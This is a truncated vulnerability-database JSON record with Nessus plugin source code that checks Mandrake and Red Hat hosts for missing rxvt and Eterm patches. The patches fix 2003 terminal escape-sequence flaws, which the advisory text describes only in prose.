"2003-02-25T00:00:00", "modified": "2003-02-25T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "cvss2": {}, "cvss3": {}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:4128", "reporter": "Securityvulns", "references": [], "cvelist": ["CVE-2003-0064", "CVE-2003-0079", "CVE-2003-0065", "CVE-2003-0068", "CVE-2003-0071", "CVE-2003-0066", "CVE-2003-0063", "CVE-2003-0021", "CVE-2003-0022", "CVE-2003-0067", "CVE-2003-0023", "CVE-2003-0070", "CVE-2003-0024", "CVE-2003-0069", "CVE-2003-0020", "CVE-2003-0078"], "immutableFields": [], "lastseen": "2018-08-31T11:10:07", "viewCount": 836, "enchantments": {"score": {"value": -0.5, "vector": "NONE"}, "dependencies": {"references": [{"type": "cert", "idList": ["VU:206537", "VU:230561"]}, {"type": "cve", "idList": ["CVE-2003-0020", "CVE-2003-0021", "CVE-2003-0022", "CVE-2003-0023", "CVE-2003-0024", "CVE-2003-0063", "CVE-2003-0064", "CVE-2003-0065", "CVE-2003-0066", "CVE-2003-0067", "CVE-2003-0068", "CVE-2003-0069", "CVE-2003-0070", "CVE-2003-0071", "CVE-2003-0078", "CVE-2003-0079", "CVE-2003-0083", "CVE-2008-2383", "CVE-2010-2713", "CVE-2015-8971"]}, {"type": "debian", "idList": ["DEBIAN:DSA-253-1:CEE72", "DEBIAN:DSA-253-1:FA5F0", "DEBIAN:DSA-380-1:9672A", "DEBIAN:DSA-496-1:2090D", "DEBIAN:DSA-496-1:F500E"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2003-0020", "DEBIANCVE:CVE-2003-0021", "DEBIANCVE:CVE-2003-0022", "DEBIANCVE:CVE-2003-0023", "DEBIANCVE:CVE-2003-0066", "DEBIANCVE:CVE-2003-0068", "DEBIANCVE:CVE-2003-0069", "DEBIANCVE:CVE-2003-0070", "DEBIANCVE:CVE-2003-0078", "DEBIANCVE:CVE-2003-0083", "DEBIANCVE:CVE-2008-2383", "DEBIANCVE:CVE-2010-2713", "DEBIANCVE:CVE-2015-8971"]}, {"type": "exploitdb", "idList": ["EDB-ID:9887"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:44DAC602FB30402C58970DFAB1C4AF87"]}, {"type": "f5", "idList": ["F5:K2319", "SOL2319"]}, {"type": "fedora", "idList": ["FEDORA:84D14208457", "FEDORA:9286A208DEA", "FEDORA:DD06D208DE9"]}, {"type": "gentoo", "idList": ["GLSA-200405-22"]}, {"type": "httpd", "idList": ["HTTPD:7B789993A3BDA0E4D014A8671E97D1EA", "HTTPD:EBD3DD4D242A4386411051C0406ED8B8"]}, {"type": "nessus", "idList": ["1221.PRM", "1515.PRM", "2444.PRM", "5489.PRM", "APACHE_LOG_INJECTION.NASL", "DEBIAN_DSA-253.NASL", "DEBIAN_DSA-380.NASL", "DEBIAN_DSA-496.NASL", "FEDORA_2004-117.NASL", "FEDORA_2009-0059.NASL", "FEDORA_2009-0091.NASL", "FEDORA_2009-0154.NASL", "GENTOO_GLSA-200405-22.NASL", "HPUX_PHSS_28685.NASL", "HPUX_PHSS_28686.NASL", "HPUX_PHSS_30639.NASL", "HPUX_PHSS_30640.NASL", "HPUX_PHSS_30641.NASL", "HPUX_PHSS_30642.NASL", "HPUX_PHSS_30643.NASL", "HPUX_PHSS_30644.NASL", "HPUX_PHSS_30645.NASL", "HPUX_PHSS_30646.NASL", "HPUX_PHSS_30647.NASL", "HPUX_PHSS_30648.NASL", "HPUX_PHSS_30649.NASL", "HPUX_PHSS_30650.NASL", "MACOSX_10_6_3.NASL", "MACOSX_SECUPD20040126.NASL", "MACOSX_SECUPD20040503.NASL", "MACOSX_SECUPD20041202.NASL", "MACOSX_SECUPD2010-002.NASL", "MACOSX_VERSION.NASL", "MANDRAKE_MDKSA-2003-003.NASL", "MANDRAKE_MDKSA-2003-020.NASL", "MANDRAKE_MDKSA-2003-034.NASL", "MANDRAKE_MDKSA-2003-040.NASL", "MANDRAKE_MDKSA-2003-050.NASL", "MANDRAKE_MDKSA-2004-046.NASL", "MANDRIVA_MDVSA-2010-161.NASL", "OPENSSL_PASSWORD_INTERCEPTION.NASL", "REDHAT-RHSA-2003-055.NASL", "REDHAT-RHSA-2003-063.NASL", "REDHAT-RHSA-2003-065.NASL", "REDHAT-RHSA-2003-071.NASL", "REDHAT-RHSA-2003-244.NASL", "REDHAT_FIXES.NASL", "SLACKWARE_SSA_2004-133-01.NASL", "SOLARIS8_116973.NASL", "SOLARIS8_X86_116974.NASL", "SOLARIS9_113146.NASL", "SOLARIS9_X86_114145.NASL", "SUSE_SA_2003_011.NASL", "UBUNTU_USN-962-1.NASL"]}, {"type": "openssl", "idList": ["OPENSSL:CVE-2003-0078"]}, {"type": "openvas", "idList": ["OPENVAS:102039", "OPENVAS:12239", "OPENVAS:1361412562310102039", "OPENVAS:136141256231012239", "OPENVAS:136141256231014262", "OPENVAS:136141256231053931", "OPENVAS:136141256231063104", "OPENVAS:136141256231063116", "OPENVAS:136141256231063120", "OPENVAS:136141256231063121", "OPENVAS:136141256231065283", "OPENVAS:1361412562310831137", "OPENVAS:1361412562310835023", "OPENVAS:1361412562310835044", "OPENVAS:1361412562310835121", "OPENVAS:14262", "OPENVAS:53186", "OPENVAS:53329", "OPENVAS:53665", "OPENVAS:53931", "OPENVAS:54582", "OPENVAS:63104", "OPENVAS:63116", "OPENVAS:63120", "OPENVAS:63121", "OPENVAS:65283", "OPENVAS:831137", "OPENVAS:835023", "OPENVAS:835044", "OPENVAS:835121"]}, {"type": "oraclelinux", "idList": ["ELSA-2015-3022", "ELSA-2019-4581", "ELSA-2019-4747"]}, {"type": "osv", "idList": ["OSV:DSA-253", "OSV:DSA-380", "OSV:DSA-496"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:82197", "PACKETSTORM:85018"]}, {"type": "redhat", "idList": ["RHSA-2003:055", "RHSA-2003:063", "RHSA-2003:065", "RHSA-2003:071", "RHSA-2003:244"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:22678", "SECURITYVULNS:DOC:23029", "SECURITYVULNS:DOC:4102", "SECURITYVULNS:DOC:4741", "SECURITYVULNS:DOC:6078"]}, {"type": "seebug", "idList": ["SSV:14432", "SSV:17994", "SSV:66957"]}, {"type": "slackware", "idList": ["SSA-2004-133-01"]}, {"type": "suse", "idList": ["SUSE-SA:2003:011", "SUSE-SA:2004:008", "SUSE-SA:2004:009", "SUSE-SA:2004:012", "SUSE-SA:2004:014", "SUSE-SA:2004:015"]}, {"type": "threatpost", "idList": ["THREATPOST:4F867C686B7E31697E158FBD04A5DD35"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2003-0020", "UB:CVE-2003-0063", "UB:CVE-2003-0066", "UB:CVE-2003-0071", "UB:CVE-2003-0078", "UB:CVE-2008-2383", "UB:CVE-2010-2713", "UB:CVE-2015-8971"]}]}, "backreferences": {"references": [{"type": "cert", "idList": ["VU:230561"]}, {"type": "cve", "idList": ["CVE-2003-0020", "CVE-2003-0021", "CVE-2003-0022", "CVE-2003-0023", "CVE-2003-0024", "CVE-2003-0063", "CVE-2003-0064", "CVE-2003-0065", "CVE-2003-0066", "CVE-2003-0067", "CVE-2003-0068", "CVE-2003-0069", "CVE-2003-0070", "CVE-2003-0071", "CVE-2003-0078", "CVE-2003-0079"]}, {"type": "debian", "idList": ["DEBIAN:DSA-380-1:9672A"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2003-0021"]}, {"type": "dsquare", "idList": ["E-2"]}, {"type": "exploitdb", "idList": ["EDB-ID:9887"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:44DAC602FB30402C58970DFAB1C4AF87"]}, {"type": "f5", "idList": ["SOL2319"]}, {"type": "httpd", "idList": ["HTTPD:7B789993A3BDA0E4D014A8671E97D1EA"]}, {"type": "nessus", "idList": ["2444.PRM", "APACHE_LOG_INJECTION.NASL", "HPUX_PHSS_30650.NASL", "MACOSX_SECUPD20041202.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:102039", "OPENVAS:14262"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:82197"]}, {"type": "redhat", "idList": ["RHSA-2003:065"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:2614"]}, {"type": "seebug", "idList": ["SSV:66957"]}, {"type": "slackware", "idList": ["SSA-2004-133-01"]}, {"type": "suse", "idList": ["SUSE-SA:2004:014", "SUSE-SA:2004:015"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2003-0066"]}]}, "exploitation": null, "affected_software": {"major_version": []}, "epss": [{"cve": "CVE-2003-0064", "epss": "0.002920000", "percentile": "0.642880000", "modified": "2023-03-20"}, {"cve": "CVE-2003-0079", "epss": "0.000700000", "percentile": "0.282610000", "modified": "2023-03-20"}, {"cve": "CVE-2003-0065", "epss": "0.007350000", "percentile": "0.778690000", "modified": "2023-03-20"}, {"cve": "CVE-2003-0068", "epss": "0.005240000", "percentile": "0.733510000", "modified": "2023-03-20"}, {"cve": "CVE-2003-0071", "epss": "0.000700000", "percentile": "0.282610000", "modified": "2023-03-20"}, {"cve": "CVE-2003-0066", "epss": "0.005960000", "percentile": "0.750620000", "modified": "2023-03-20"}, {"cve": "CVE-2003-0063", "epss": "0.013630000", "percentile": "0.841420000", "modified": "2023-03-20"}, {"cve": "CVE-2003-0021", "epss": "0.008880000", "percentile": "0.801370000", "modified": "2023-03-20"}, {"cve": "CVE-2003-0022", "epss": "0.009980000", "percentile": "0.812940000", "modified": "2023-03-20"}, {"cve": "CVE-2003-0067", "epss": "0.006600000", "percentile": "0.764430000", "modified": "2023-03-20"}, {"cve": "CVE-2003-0023", "epss": "0.013950000", "percentile": "0.843370000", "modified": "2023-03-20"}, {"cve": "CVE-2003-0070", "epss": "0.003790000", "percentile": "0.686930000", "modified": "2023-03-20"}, {"cve": "CVE-2003-0024", "epss": "0.007350000", "percentile": "0.778690000", "modified": "2023-03-20"}, {"cve": "CVE-2003-0069", "epss": "0.007350000", "percentile": "0.778690000", "modified": "2023-03-20"}, {"cve": "CVE-2003-0020", "epss": "0.002630000", "percentile": "0.622410000", "modified": "2023-03-20"}, {"cve": "CVE-2003-0078", "epss": "0.021330000", "percentile": "0.874820000", "modified": "2023-03-19"}], "vulnersScore": -0.5}, "_state": {"dependencies": 1678962117, "score": 1698853398, "affected_software_major_version": 0, "epss": 1679322135}, "_internal": {"score_hash": "df18391a6e41a2fa7da359fdc20645fa"}, "sourceData": "", "affectedSoftware": [], "appercut": {}, "exploitpack": {}, "hackapp": {}, "toolHref": "", "w3af": {}}

{"nessus": [{"lastseen": "2023-11-29T14:12:50", "description": "Digital Defense Inc. released a paper detailing insecurities in various terminal emulators, including rxvt. Many of the features supported by these programs can be abused when untrusted data is displayed on the screen. This abuse can be anything from garbage data being displayed to the screen or a system compromise.", "cvss3": {}, "published": "2004-07-31T00:00:00", "type": "nessus", "title": "Mandrake Linux Security Advisory : rxvt (MDKSA-2003:034)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2003-0022", "CVE-2003-0023", "CVE-2003-0066"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:rxvt", "p-cpe:/a:mandriva:linux:rxvt-cjk", "p-cpe:/a:mandriva:linux:rxvt-devel", "cpe:/o:mandrakesoft:mandrake_linux:8.2", "cpe:/o:mandrakesoft:mandrake_linux:9.0", "cpe:/o:mandrakesoft:mandrake_linux:9.1"], "id": "MANDRAKE_MDKSA-2003-034.NASL", "href": "https://www.tenable.com/plugins/nessus/14018", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandrake Linux Security Advisory MDKSA-2003:034. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(14018);\n script_version(\"1.20\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2003-0022\", \"CVE-2003-0023\", \"CVE-2003-0066\");\n script_xref(name:\"MDKSA\", value:\"2003:034\");\n\n script_name(english:\"Mandrake Linux Security Advisory : rxvt (MDKSA-2003:034)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandrake Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Digital Defense Inc. released a paper detailing insecurities in\nvarious terminal emulators, including rxvt. Many of the features\nsupported by these programs can be abused when untrusted data is\ndisplayed on the screen. This abuse can be anything from garbage data\nbeing displayed to the screen or a system compromise.\"\n );\n # http://marc.theaimsgroup.com/?l=bugtraq&m=104612710031920&w=2\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://marc.info/?l=bugtraq&m=104612710031920&w=2\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected rxvt, rxvt-CJK and / or rxvt-devel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:rxvt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:rxvt-CJK\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:rxvt-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:8.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:9.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:9.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2003/03/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/07/31\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK8.2\", cpu:\"i386\", reference:\"rxvt-2.7.8-6.1mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK8.2\", cpu:\"i386\", reference:\"rxvt-CJK-2.7.8-6.1mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK8.2\", cpu:\"i386\", reference:\"rxvt-devel-2.7.8-6.1mdk\", yank:\"mdk\")) flag++;\n\nif (rpm_check(release:\"MDK9.0\", cpu:\"i386\", reference:\"rxvt-2.7.8-6.1mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.0\", cpu:\"i386\", reference:\"rxvt-CJK-2.7.8-6.1mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.0\", cpu:\"i386\", reference:\"rxvt-devel-2.7.8-6.1mdk\", yank:\"mdk\")) flag++;\n\nif (rpm_check(release:\"MDK9.1\", cpu:\"i386\", reference:\"rxvt-2.7.8-6.1mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.1\", cpu:\"i386\", reference:\"rxvt-CJK-2.7.8-6.1mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.1\", cpu:\"i386\", reference:\"rxvt-devel-2.7.8-6.1mdk\", yank:\"mdk\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-11-28T14:33:37", "description": "Updated rxvt packages are available which fix a number of vulnerabilities in the handling of escape sequences.\n\n[Updated 12 March 2003] Added packages for Red Hat Enterprise Linux ES and Red Hat Enterprise Linux WS\n\nRxvt is a color VT102 terminal emulator for the X Window System. A number of issues have been found in the escape sequence handling of Rxvt. These could be potentially exploited if an attacker can cause carefully crafted escape sequences to be displayed on an rxvt terminal being used by their victim.\n\nOne of the features which most terminal emulators support is the ability for the shell to set the title of the window using an escape sequence. Certain xterm variants, including rxvt, also provide an escape sequence for reporting the current window title. This essentially takes the current title and places it directly on the command line. Since it is not possible to embed a carriage return into the window title itself, the attacker would have to convince the victim to press the Enter key for the title to be processed as a command, although the attacker can perform a number of actions to increase the likelihood of this happening.\n\nA certain escape sequence when displayed in rxvt will create an arbitrary file.\n\nIt is possible to add malicious items to the dynamic menus through an escape sequence.\n\nUsers of Rxvt are advised to upgrade to these errata packages which contain a patch to disable the title reporting functionality and patches to correct the other issues.\n\nRed Hat would like to thank H D Moore for bringing these issues to our attention.", "cvss3": {}, "published": "2004-07-06T00:00:00", "type": "nessus", "title": "RHEL 2.1 : rxvt (RHSA-2003:055)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2003-0022", "CVE-2003-0023", "CVE-2003-0066"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:rxvt", "cpe:/o:redhat:enterprise_linux:2.1"], "id": "REDHAT-RHSA-2003-055.NASL", "href": "https://www.tenable.com/plugins/nessus/12365", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2003:055. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(12365);\n script_version(\"1.26\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2003-0022\", \"CVE-2003-0023\", \"CVE-2003-0066\");\n script_xref(name:\"RHSA\", value:\"2003:055\");\n\n script_name(english:\"RHEL 2.1 : rxvt (RHSA-2003:055)\");\n script_summary(english:\"Checks the rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated rxvt packages are available which fix a number of\nvulnerabilities in the handling of escape sequences.\n\n[Updated 12 March 2003] Added packages for Red Hat Enterprise Linux ES\nand Red Hat Enterprise Linux WS\n\nRxvt is a color VT102 terminal emulator for the X Window System. A\nnumber of issues have been found in the escape sequence handling of\nRxvt. These could be potentially exploited if an attacker can cause\ncarefully crafted escape sequences to be displayed on an rxvt terminal\nbeing used by their victim.\n\nOne of the features which most terminal emulators support is the\nability for the shell to set the title of the window using an escape\nsequence. Certain xterm variants, including rxvt, also provide an\nescape sequence for reporting the current window title. This\nessentially takes the current title and places it directly on the\ncommand line. Since it is not possible to embed a carriage return into\nthe window title itself, the attacker would have to convince the\nvictim to press the Enter key for the title to be processed as a\ncommand, although the attacker can perform a number of actions to\nincrease the likelihood of this happening.\n\nA certain escape sequence when displayed in rxvt will create an\narbitrary file.\n\nIt is possible to add malicious items to the dynamic menus through an\nescape sequence.\n\nUsers of Rxvt are advised to upgrade to these errata packages which\ncontain a patch to disable the title reporting functionality and\npatches to correct the other issues.\n\nRed Hat would like to thank H D Moore for bringing these issues to our\nattention.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2003-0022\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2003-0023\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2003-0066\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2003:055\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected rxvt package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rxvt\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:2.1\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2003/03/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2003/03/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/07/06\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^2\\.1([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 2.1\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\nif (cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i386\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2003:055\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"rxvt-2.7.8-4\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"rxvt\");\n }\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-11-28T14:34:30", "description": "Digital Defense Inc. released a paper detailing insecurities in various terminal emulators, including Eterm. Many of the features supported by these programs can be abused when untrusted data is displayed on the screen. This abuse can be anything from garbage data being displayed to the screen or a system compromise.\n\nThese issues are corrected in Eterm 0.9.2, which is already included in Mandrake Linux 9.1.", "cvss3": {}, "published": "2004-07-31T00:00:00", "type": "nessus", "title": "Mandrake Linux Security Advisory : Eterm (MDKSA-2003:040)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2003-0021", "CVE-2003-0068"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:eterm", "p-cpe:/a:mandriva:linux:eterm-devel", "p-cpe:/a:mandriva:linux:libast1", "p-cpe:/a:mandriva:linux:libast1-devel", "cpe:/o:mandrakesoft:mandrake_linux:9.0"], "id": "MANDRAKE_MDKSA-2003-040.NASL", "href": "https://www.tenable.com/plugins/nessus/14024", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandrake Linux Security Advisory MDKSA-2003:040. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(14024);\n script_version(\"1.22\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2003-0021\", \"CVE-2003-0068\");\n script_xref(name:\"MDKSA\", value:\"2003:040\");\n\n script_name(english:\"Mandrake Linux Security Advisory : Eterm (MDKSA-2003:040)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandrake Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Digital Defense Inc. released a paper detailing insecurities in\nvarious terminal emulators, including Eterm. Many of the features\nsupported by these programs can be abused when untrusted data is\ndisplayed on the screen. This abuse can be anything from garbage data\nbeing displayed to the screen or a system compromise.\n\nThese issues are corrected in Eterm 0.9.2, which is already included\nin Mandrake Linux 9.1.\"\n );\n # http://marc.theaimsgroup.com/?l=bugtraq&m=104612710031920&w=2\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://marc.info/?l=bugtraq&m=104612710031920&w=2\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:Eterm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:Eterm-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libast1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libast1-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:9.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2003/04/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/07/31\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK9.0\", cpu:\"i386\", reference:\"Eterm-0.9.2-2.1mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.0\", cpu:\"i386\", reference:\"Eterm-devel-0.9.2-2.1mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.0\", cpu:\"i386\", reference:\"libast1-0.5-1.1mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.0\", cpu:\"i386\", reference:\"libast1-devel-0.5-1.1mdk\", yank:\"mdk\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": 